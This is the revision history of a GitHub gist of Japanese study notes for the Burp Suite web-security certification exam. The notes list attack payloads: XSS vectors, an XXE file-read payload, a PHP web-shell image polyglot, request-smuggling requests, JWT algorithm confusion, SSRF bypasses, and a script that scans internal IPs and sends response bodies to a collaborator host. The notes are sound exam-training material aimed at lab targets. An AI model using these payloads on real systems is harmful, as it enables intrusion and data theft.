-
-
Save sg1965/9a381eb9b6f159b6f88f28dbb0a1507e to your computer and use it in GitHub Desktop.
Revisions
-
wonda-tea-coffee revised this gist
Sep 23, 2022 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -743,7 +743,7 @@ Host: 0afb00df04e0e634c0659e2400310083.web-security-academy.net - キャッシュキーの特定 - Pragma: x-get-cache-key(for Akamai) - Varyヘッダ - クエリパラメータutm_content(utm_source, utm_medium)はキャッシュキーから除外されたり、レスポンスに反映されるかもしれない - キャッシュサーバーとバックエンドサーバーのクエリパラメータの解釈に相違がある - バックエンドサーバーのみが;をセパレーターとして解釈する場合 - /js/geolocate.js?callback=setCountryCookie&utm_content=1;callback=alert(1) -
Sep 11, 2022 . No changes.There are no files selected for viewing
-
Sep 11, 2022 . 1 changed file with 7 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -123,6 +123,13 @@ window.onload = (e) => {/* 何か */}; - aタグが書けるがhref=**がブロックされる場合 `<a href ping="***">` で任意のURLにPOSTリクエストが出せる - formがある画面の場合、form内の値をクエリパラメータから受け付けているかもしれない - ユーザーに目当ての要素を選択させる必要があり、任意のURLを踏ませられる場合は以下のようなコードが有効な場合がある ```html <script> location = "target.com?x=<input onfocus=alert(1) id=x>#x" </script> ``` - DOM clobbering - https://portswigger.net/web-security/dom-based/dom-clobbering -
Sep 10, 2022 . 1 changed file with 3 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -124,6 +124,9 @@ window.onload = (e) => {/* 何か */}; - aタグが書けるがhref=**がブロックされる場合 `<a href ping="***">` で任意のURLにPOSTリクエストが出せる - formがある画面の場合、form内の値をクエリパラメータから受け付けているかもしれない - DOM clobbering - https://portswigger.net/web-security/dom-based/dom-clobbering ### Further more - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet - https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting -
Sep 10, 2022 . 1 changed file with 8 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -34,6 +34,11 @@ - HTMLの属性はダブルクォートで囲うこと - シングルクォートで囲ってもレンダリング時にダブルクォートに変換される - 特定のパスでリダイレクトを起こせるか - Ascii to String ```ruby %w(51 101 48 103 104 104 103 101 122 57 119 99 121 56 101 56 98 103 97 111).map(&:to_i).map(&:chr).join ``` ### Find more - https://portswigger.net/web-security/reference/obfuscating-attacks-using-encodings @@ -202,6 +207,9 @@ for (let i = 0; i < 256; i++) { - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection - content-manager:C0nt3ntM4n4g3rでログインできる ### Find more - https://portswigger.net/web-security/server-side-template-injection ## Information Disclosure - TRACEメソッド - DOM内に怪しいファイルの痕跡(コメントなど)が無いか調べる -
Sep 10, 2022 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -380,7 +380,7 @@ fetch( - 検証はURLデコードした値を見る - http://evil-host%23@expected-host - リクエストの際は `http://evil-host#@expected-host` と解釈されてevil-hostへリクエストが飛ぶ - Collaborator Everywhere(Burp Extension) - 入れておくだけでリクエストの際にRefererやUser-Agentへのpingbackを検出してくれる - ミステリーラボでのターゲット - http://localhost/admin -
Sep 10, 2022 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -380,6 +380,8 @@ fetch( - 検証はURLデコードした値を見る - http://evil-host%23@expected-host - リクエストの際は `http://evil-host#@expected-host` と解釈されてevil-hostへリクエストが飛ぶ - Collaborator Everywhere - 入れておくだけでリクエストの際にRefererやUser-Agentへのpingbackを検出してくれる - ミステリーラボでのターゲット - http://localhost/admin - 192.168.0.0/24 -
Sep 10, 2022 . 1 changed file with 5 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -375,6 +375,11 @@ fetch( - HTTP Host header attacksのテクニックを試す - Whitelist bypass - https://github.com/0x221b/Wordlists/blob/master/Attacks/SSRF/Whitelist-bypass.txt - http://evil-host%2523@expected-host - username:passwordをサポートする場合に使える可能性がある - 検証はURLデコードした値を見る - http://evil-host%23@expected-host - リクエストの際は `http://evil-host#@expected-host` と解釈されてevil-hostへリクエストが飛ぶ - ミステリーラボでのターゲット - http://localhost/admin - 192.168.0.0/24 -
Sep 10, 2022 . 1 changed file with 3 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -370,9 +370,11 @@ fetch( ## SSRF - Fuzzing List - https://raw.githubusercontent.com/osamahamad/FUZZING/main/localhost.txt - RefererヘッダにBurp Collabratorサーバのホストを入れてページを巡回する - HTTP Host header attacksのテクニックを試す - Whitelist bypass - https://github.com/0x221b/Wordlists/blob/master/Attacks/SSRF/Whitelist-bypass.txt - ミステリーラボでのターゲット - http://localhost/admin - 192.168.0.0/24 -
Sep 9, 2022 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -350,7 +350,7 @@ fetch( ### ローカルDTDの再利用 ```xml <!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd"> <!ENTITY % custom_entity ' -
Sep 9, 2022 . 1 changed file with 17 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -348,6 +348,23 @@ fetch( <?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY [xxe](https://portswigger.net/web-security/xxe) SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg> ``` ### ローカルDTDの再利用 ``` <!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd"> <!ENTITY % custom_entity ' <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; '> %local_dtd; ]> ``` - [ローカルファイルの探索とファイルごとのペイロード](https://github.com/GoSecure/dtd-finder) ### Other resources - https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity -
Sep 9, 2022 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -117,6 +117,7 @@ window.onload = (e) => {/* 何か */}; ``` - aタグが書けるがhref=**がブロックされる場合 `<a href ping="***">` で任意のURLにPOSTリクエストが出せる - formがある画面の場合、form内の値をクエリパラメータから受け付けているかもしれない ### Further more - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet -
Sep 9, 2022 . 1 changed file with 14 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -172,6 +172,20 @@ fetch(`https://LAB/accountDetails`, { <iframe src=https://your-lab-id.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'> ``` - 内部IPのブルートフォース ```html <script> const BURP_HOST = '5qwkaad5lhyov1p42rppclhwnntdh2.oastify.com' for (let i = 0; i < 256; i++) { fetch(`http://192.168.0.${i}:8080`) .then(res => { res.text().then(text => { fetch(`http://${BURP_HOST}?q=${i}&body=${encodeURIComponent(text)}`) })}) } </script> ``` ## OS Command Injection - &, ||, ;などを使ってコマンドに割り込む - 上記の記号を入れてエラーが起きるか -
Sep 9, 2022 . No changes.There are no files selected for viewing
-
Sep 8, 2022 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -40,6 +40,8 @@ ## Burpテクニック - Repeaterでは複数リクエストをグルーピングして単一コネクションで順にリクエストを送信できる - 手動テストtips - https://portswigger.net/web-security/reference/augmenting-your-manual-testing-with-burp-scanner ## SQL Injection - `foo' OR 1=1 --` ですべてのレコードを取得する -
Sep 8, 2022 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -35,6 +35,8 @@ - シングルクォートで囲ってもレンダリング時にダブルクォートに変換される - 特定のパスでリダイレクトを起こせるか ### Find more - https://portswigger.net/web-security/reference/obfuscating-attacks-using-encodings ## Burpテクニック - Repeaterでは複数リクエストをグルーピングして単一コネクションで順にリクエストを送信できる -
Sep 8, 2022 . 1 changed file with 27 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -375,6 +375,33 @@ AddType application/x-httpd-php .hoge exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" -o polyglot.php [元になる画像ファイル] ``` - race condition ```python def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,) request1 = '''<YOUR-POST-REQUEST>''' request2 = '''<YOUR-GET-REQUEST>''' # the 'gate' argument blocks the final byte of each request until openGate is invoked engine.queue(request1, gate='race1') for x in range(5): engine.queue(request2, gate='race1') # wait until every 'race1' tagged request is ready # then send the final byte of each request # (this method is non-blocking, just like queue) engine.openGate('race1') engine.complete(timeout=60) def handleResponse(req, interesting): table.add(req) ``` ### 参考 - https://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html -
Sep 8, 2022 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -757,6 +757,8 @@ location = `${oauth_server}/auth?client_id=${client_id}&redirect_uri=${exploit_s - algヘッダーをHS256に変える - 後はお好きに - RSA公開鍵をシークレットとしてHS256アルゴリズムを使用してトークンに署名 - 公開鍵が利用できない場合、生成した2つのJWTから公開鍵を割り出せることがある - `docker run --rm -it portswigger/sig2n <token1> <token2>` ## Apache - /files/server-status -
Sep 8, 2022 . 1 changed file with 17 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -740,6 +740,23 @@ location = `${oauth_server}/auth?client_id=${client_id}&redirect_uri=${exploit_s - `AA==`をBase64エンコード済みの秘密鍵とする - JWTの作成はjwt.ioが便利 - [jwt.io](https://jwt.io/) - Algorithm confusion - 実装者はRS256を仮定しているのに、ライブラリはヘッダーを見てRS256とHS256のどちらも受け入れる場合に起こる - 悪用の流れ - ※X.509 PEM形式のキーが攻撃対象のサーバに保存されていると仮定) - `/jwks.json` または `/.well-known/jwks.json` でjwkを入手 - 公開鍵を適切なフォーマットに変換 - 1. 公開鍵をコピーしてJWT Editor Keysタブへ - 2. New RSA Keyを押してjwkキーを貼り付ける - 3. ラジオボタンPEMを押してPEMに変換 - 4. PEMをBase64エンコードしてコピー - 5. JWT Editor Keysタブに 戻り、New Symmetric Keyを選択 - 6. ダイアログボックスで生成をクリックして、JWK形式で新しいキーを生成 - 7. kパラメータの値を4でコピーした値で置き換える - JWTを変更する - algヘッダーをHS256に変える - 後はお好きに - RSA公開鍵をシークレットとしてHS256アルゴリズムを使用してトークンに署名 ## Apache - /files/server-status -
Sep 8, 2022 . 1 changed file with 4 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -363,6 +363,7 @@ AddType application/x-httpd-php .hoge - 拡張子 - 大文字、小文字を混ぜる - 複数付ける - ex. shell.php.test - .を(ダブル)URLエンコード - 前にセミコロンやヌルバイト - マルチバイトなユニコード文字 @@ -374,6 +375,9 @@ AddType application/x-httpd-php .hoge exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" -o polyglot.php [元になる画像ファイル] ``` ### 参考 - https://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html ## Access control vulnerabilities - クエリパラメータ、メッセージボディ、HTTPメソッド、ヘッダー(ex. リファラ)、クッキーを書き換える - POSTXなど未知のメソッドを試す -
Sep 8, 2022 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -649,7 +649,7 @@ Host: 0afb00df04e0e634c0659e2400310083.web-security-academy.net - キャッシュキーの特定 - Pragma: x-get-cache-key(for Akamai) - Varyヘッダ - クエリパラメータutm_content(utm_source, utm_mediun)はキャッシュキーから除外されたり、レスポンスに反映されるかもしれない - キャッシュサーバーとバックエンドサーバーのクエリパラメータの解釈に相違がある - バックエンドサーバーのみが;をセパレーターとして解釈する場合 - /js/geolocate.js?callback=setCountryCookie&utm_content=1;callback=alert(1) -
Sep 6, 2022 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -544,6 +544,7 @@ Host: vulnerable-website.com ``` - https://portswigger.net/web-security/request-smuggling/browser/cl-0 - https://portswigger.net/research/how-to-turn-security-research-into-profit ### H2.TE型 -
Sep 5, 2022 . 1 changed file with 2 additions and 4 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -91,10 +91,8 @@ python3 sqlmap.py -u URL_WITH_PARAMS -T TABLE_NAME --dump -o - location.hrefを変えて強制遷移させる - JavaScriptで<>をreplaceしている場合は<>を前に挟む - 正しくはreplaceAll - via SVG - `<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>` - クッキーを盗む ``` -
Sep 5, 2022 . 1 changed file with 5 additions and 3 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -116,15 +116,17 @@ window.onload = (e) => {/* 何か */}; - aタグが書けるがhref=**がブロックされる場合 `<a href ping="***">` で任意のURLにPOSTリクエストが出せる ### Further more - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet - https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting - https://brutelogic.com.br/blog/xss-without-event-handlers/ ### WAF bypass tips - https://www.w3.org/TR/2012/WD-html-markup-20120329/terminology.html#space ## CORS - Originをそのまま信頼しているか ```html <script> fetch(`https://LAB/accountDetails`, { -
Sep 5, 2022 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -114,6 +114,8 @@ python3 sqlmap.py -u URL_WITH_PARAMS -T TABLE_NAME --dump -o window.onload = (e) => {/* 何か */}; ``` - aタグが書けるがhref=**がブロックされる場合 `<a href ping="***">` で任意のURLにPOSTリクエストが出せる ### WAF bypass tips - https://www.w3.org/TR/2012/WD-html-markup-20120329/terminology.html#space -
Sep 4, 2022 . 1 changed file with 3 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -114,6 +114,9 @@ python3 sqlmap.py -u URL_WITH_PARAMS -T TABLE_NAME --dump -o window.onload = (e) => {/* 何か */}; ``` ### WAF bypass tips - https://www.w3.org/TR/2012/WD-html-markup-20120329/terminology.html#space ### Further more - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet - https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting -
Sep 4, 2022 . No changes.There are no files selected for viewing
-
Sep 4, 2022 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -149,6 +149,7 @@ fetch(`https://LAB/accountDetails`, { - ../が削除されるならば....// - 2重URLエンコード - 特定文字列から始まっていれば良いのであれば/var/www/images/../../../etc/passed - `../etc/passwd%00.jpg` ## DOM-based vulnerabilities - web message -
Sep 4, 2022 . 1 changed file with 41 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -508,6 +508,37 @@ x=1 ``` ### CL.0型 リクエストボディを想定していないようなエンドポイントにおいて、HTTPヘッダの終わりをリクエストの終わりと解釈する場合、以下の2つのリクエストをシングルコネクションで連続送信する。 ```req1 POST /vulnerable-endpoint HTTP/1.1 Host: vulnerable-website.com Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 34 GET /admin HTTP/1.1 Foo: x ``` ```req2 GET /anything HTTP/1.1 Host: vulnerable-website.com ``` 結果、バックエンドサーバーでは以下のようなリクエストが届くことがある。 ``` GET /admin HTTP/1.1 Foo: xGET /anything HTTP/1.1 Host: vulnerable-website.com ``` - https://portswigger.net/web-security/request-smuggling/browser/cl-0 ### H2.TE型 HTTP/2においてはContent-Lengthに依らずボディのサイズを算出する仕組みがあるが、これまで同様にTransfer-Encodingを受け入れる場合やはりサーバ間でそれらのHTTPヘッダの解釈差が生まれることがある。 @@ -542,6 +573,16 @@ Content-Length: 5 x=1 ``` ### HTTP/2 request smuggling via CRLF injection - `Foo: bar\r\nTransfer-Encoding: chunked` - https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-smuggling-via-crlf-injection ### HTTP/2 request splitting via CRLF injection - `Foo: bar\r\nGET /admin HTTP/1.1\r\nHost: target` - https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection ### 心得 - バックグランドでスキャナーやエクステンションの類を動かさないこと - リクエスト順によるレスポンスの違いが確かめられなくなる -
Sep 4, 2022 . 1 changed file with 37 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -6,7 +6,7 @@ - ステージ2: アカウントを使用して /admin の管理インターフェイスにアクセスする。おそらく、権限を昇格させるか、管理者アカウントを侵害する。 - ステージ3: 管理インターフェイスを使用して、サーバーのファイルシステムから `/home/carlos/secret` の内容を読み取り、"submit solution" を使用して送信する。 - ユーザー名「 administrator 」を持つ管理者アカウントと、通常は「 carlos 」と呼ばれる権限の低いアカウントが常に存在する。ユーザー名列挙の脆弱性が見つかった場合、次の[ユーザー名リスト](https://portswigger.net/web-security/authentication/auth-lab-usernames)と[パスワードリスト](https://portswigger.net/web-security/authentication/auth-lab-passwords)を使用して、権限の低いアカウントに侵入できる可能性がある。 - 各アプリケーションには最大1人のアクティブユーザーがおり、ユーザーまたは管理者としてログインする。ユーザーは15秒ごとにサイトのホームページにアクセスし、アプリケーションから受信した電子メールのリンクをクリックすると想定できる。エクスプロイトサーバーの「被害者への送信」機能を使用して、反映された脆弱性をターゲットにすることができる。 - SSRFの脆弱性が見つかった場合は、**ローカルホストのポート6566** で実行されている内部専用サービスにアクセスすることで、それを使用してファイルを読み取ることができる。 - _lab および _lab_analytics Cookie は試験のコア機能の一部のため改ざんしてはならない。 - Burp Suiteのプロジェクトファイルを使用する必要がある。プロジェクトファイルは、試験を受けてから1週間以内に証明書を確認したり、報告された問題を調査したりするために要求される場合がある。試験用のプロジェクトで始めると良い。 @@ -33,6 +33,8 @@ - TRACEメソッド - HTMLの属性はダブルクォートで囲うこと - シングルクォートで囲ってもレンダリング時にダブルクォートに変換される - 特定のパスでリダイレクトを起こせるか ## Burpテクニック - Repeaterでは複数リクエストをグルーピングして単一コネクションで順にリクエストを送信できる @@ -506,6 +508,40 @@ x=1 ``` ### H2.TE型 HTTP/2においてはContent-Lengthに依らずボディのサイズを算出する仕組みがあるが、これまで同様にTransfer-Encodingを受け入れる場合やはりサーバ間でそれらのHTTPヘッダの解釈差が生まれることがある。 例えばフロントサーバはTransfer-Encodingをサポートしておらず、バックエンドサーバーがTransfer-Encodingを優先している場合以下のようにして完全なリクエストを2つ同時に送ることができる。被害者がこのあとアクセスすると404が返り、次に攻撃者がアクセスすると被害者に返されるはずだったレスポンスが見える。このようにしてリクエストのキューを汚染することができる。 ``` POST / HTTP/2 Host: target Transfer-Encoding: chunked 0 GET /xxx HTTP/1.1 Host: target ``` ### H2.CL型 フロントサーバがHTTP/2をダウングレードして、かつ、バックエンドサーバーがContent-Lengthを採用する場合、以下のようにしてエクスプロイトサーバからのレスポンスを返すことができる。 ``` POST / HTTP/2 Host: target Content-Length: 0 GET /something HTTP/1.1 Host: target Content-Length: 5 x=1 ``` ### 心得 - バックグランドでスキャナーやエクステンションの類を動かさないこと - リクエスト順によるレスポンスの違いが確かめられなくなる
NewerOlder